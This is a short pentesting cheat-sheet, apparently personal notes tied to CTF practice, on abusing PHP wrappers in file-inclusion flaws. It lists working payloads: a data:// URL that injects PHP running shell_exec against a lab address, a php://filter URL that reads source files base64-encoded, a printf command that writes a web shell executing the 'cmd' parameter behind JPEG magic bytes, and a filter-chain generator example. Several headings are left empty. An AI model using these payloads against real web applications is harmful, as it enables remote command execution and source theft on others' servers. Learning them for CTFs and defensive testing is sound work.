PHP Wrappers
Post

PHP Wrappers

Wrappers

data

Represent a string on the web page

1
http://10.11.0.22/menu.php?file=data:text/plain,hello world

Description Shell with data

1
http://10.11.0.22/menu.php?file=data:text/plain,<?php echo shell_exec("dir") ?>

Description

php://filter

Read file with base64 encode:

1
php://filter/convert.base64-encode/resource=index.php

Examples: [[StreamIO#^c6abe1]] [[StreamIO#^56bdc2]] [[StreamIO#^2912d9]] [[StreamIO#^6f66d1]]

Bypassing restrictions

Using magic number to bypass jpeg restriction:

1
printf '\xff\xd8\xff<?=`{$_GET["cmd"]}`;>' > sploit.php

Examples: ECHO CTF Cupidme

PHP FILTER CHAIN GENERATOR

An excellent option to create a wrapper is by appending encoding wrappers for every character, this can be done with php_filter_chain_generator:

1
2
$ php -r "echo file_get_contents('php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L4.UTF32|convert.iconv.CP1250.UCS-2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.MAC.UTF16|convert.iconv.L8.UTF16BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.MAC.UTF16|convert.iconv.L8.UTF16BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.MAC.UTF16|convert.iconv.L8.UTF16BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.MAC.UTF16|convert.iconv.L8.UTF16BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L4.UTF32|convert.iconv.CP1250.UCS-2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|/resource=php://temp');"
cwwwwcGyQpQw+-AD0APQ+-AD0APQ+-AD0APQ+-AD0APQ+-AD0APQ+-AD0APQ+AD0APQ-

Common Attacks

Description